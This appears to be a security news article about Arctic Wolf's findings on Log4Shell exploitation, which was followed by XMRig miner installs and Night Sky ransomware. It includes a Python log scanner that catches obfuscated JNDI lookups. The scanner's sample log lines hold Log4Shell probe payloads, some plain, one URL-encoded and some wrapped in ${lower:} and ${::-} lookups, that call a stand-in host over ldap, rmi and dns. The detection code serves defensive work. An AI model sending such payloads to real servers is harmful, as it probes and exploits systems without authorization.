Nearly 100 percent of post-compromise behaviors following exploitation of the Log4Shell vulnerability (CVE-2021-44228) have been linked to attempted installation of the XMRig cryptocurrency miner and to Night Sky ransomware campaigns associated with the Aquatic Panda threat actor, according to an analysis of more than 2,300 Arctic Wolf customers performed in January 2022.
The presence of XMRig indicates that a cybercriminal can exploit Log4Shell to deploy unauthorized applications in an end-user's environment, Arctic Wolf noted. This represents a "much higher severity threat" than a potentially unwanted application (PUA), which is how XMRig is commonly classified.
By comparison, Arctic Wolf detected a Night Sky payload and associated activity through observations of attempted PowerShell use and various indicators of compromise (IOCs), the company indicated. It found Night Sky IOCs across eight customers.
Other notable findings from Arctic Wolf's Log4Shell analysis included:
- 29,338 unique incidents of adversarial scanning for Log4Shell were discovered as of Jan. 25, 2022, all of them targeting 807 customers.
- Fewer than 2.5 percent of customers were still susceptible to Log4Shell exploits.
- Successful remote code execution occurred in 252 incidents.
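The scanning activity counted above, and the IOC-based detection described for Night Sky, both start from the same defensive step: recognizing a Log4Shell probe in web server logs. The following is an added example, not Arctic Wolf's tooling or anything from the article, that normalizes the nested Log4j lookup wrappers commonly used to hide the `${jndi:` string and then flags lines that contain a JNDI lookup. The log lines, IP addresses and the `scanner.example` host are constructed sample data.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample access-log lines (not from the article). Line 3 is URL-encoded,
# as a web server would record it; lines 2 and 4 carry the probe in the User-Agent
# and Referer fields respectively.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Jan/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [25/Jan/2022:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://scanner.example/a}"',
    '10.0.0.9 - - [25/Jan/2022:10:01:04 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3A%24%7Blower%3Ar%7Dmi%3A//scanner.example/b%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [25/Jan/2022:10:01:05 +0000] "GET /login HTTP/1.1" 200 99 "${${::-j}${::-n}${::-d}${::-i}:dns://scanner.example/c}" "-"',
    '10.0.0.7 - - [25/Jan/2022:10:01:06 +0000] "GET /docs HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

# An innermost ${...} lookup: its content contains no further "$", "{" or "}".
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup once wrappers are resolved, e.g. ${jndi:ldap://host/path}; group 1 is the scheme.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def _resolve(content: str) -> str:
    """Collapse one innermost Log4j lookup that is only there to obfuscate; keep anything else literally."""
    key, _, rest = content.partition(":")
    key = key.strip().lower()
    if key == "lower":                 # ${lower:J} -> j
        return rest.lower()
    if key == "upper":                 # ${upper:j} -> J
        return rest.upper()
    if ":-" in content:                # ${name:-default} -> default; the name need not exist (${::-j} -> j)
        return content.rsplit(":-", 1)[1]
    return "${" + content + "}"        # e.g. the final ${jndi:...} itself; leave it in place


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Resolve nested obfuscation wrappers from the inside out until the text stops changing."""
    for _ in range(max_rounds):
        resolved = INNER_LOOKUP.sub(lambda m: _resolve(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Return one record per log line that contains a JNDI lookup after URL-decoding and normalization."""
    hits: List[Dict[str, str]] = []
    for raw in lines:
        normalized = normalize_lookups(unquote(raw))
        match = JNDI_LOOKUP.search(normalized)
        if not match:
            continue
        end = normalized.find("}", match.start())
        hits.append({
            "source_ip": raw.split(" ", 1)[0],          # first token of a combined-format line
            "scheme": match.group(1).lower(),           # ldap, rmi, dns, ...
            "decoded": normalized[match.start():end + 1],
        })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['source_ip']:<10} {hit['scheme']:<5} {hit['decoded']}")
```

Grepping for the literal string `${jndi:` misses the third and fourth lines; resolving the `${lower:...}` and `${...:-...}` wrappers first is what makes the detector catch all three probes from `10.0.0.9` while leaving ordinary traffic alone. The `dns` scheme hit is worth keeping even though it cannot load code: it is how scanners confirm which hosts are vulnerable before a follow-on payload such as a miner or ransomware loader is attempted.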
How to Protect Against Log4Shell
Strong security practices play a key role in mitigating Log4Shell exploits and other evolving threats and risks before an organization's IT infrastructure is compromised, Arctic Wolf stated. With a "defense-in-depth approach," an organization can guard against such issues.
Furthermore, an organization must explore ways to continuously improve its security posture, Arctic Wolf said. It also must use a combination of human expertise and technology to protect against cyberattacks now and in the future.
Meanwhile, many third-party scanner tools are available to help MSSPs and MSPs combat Log4Shell. Some of these tools focus exclusively on threat identification, detection, remediation and reporting.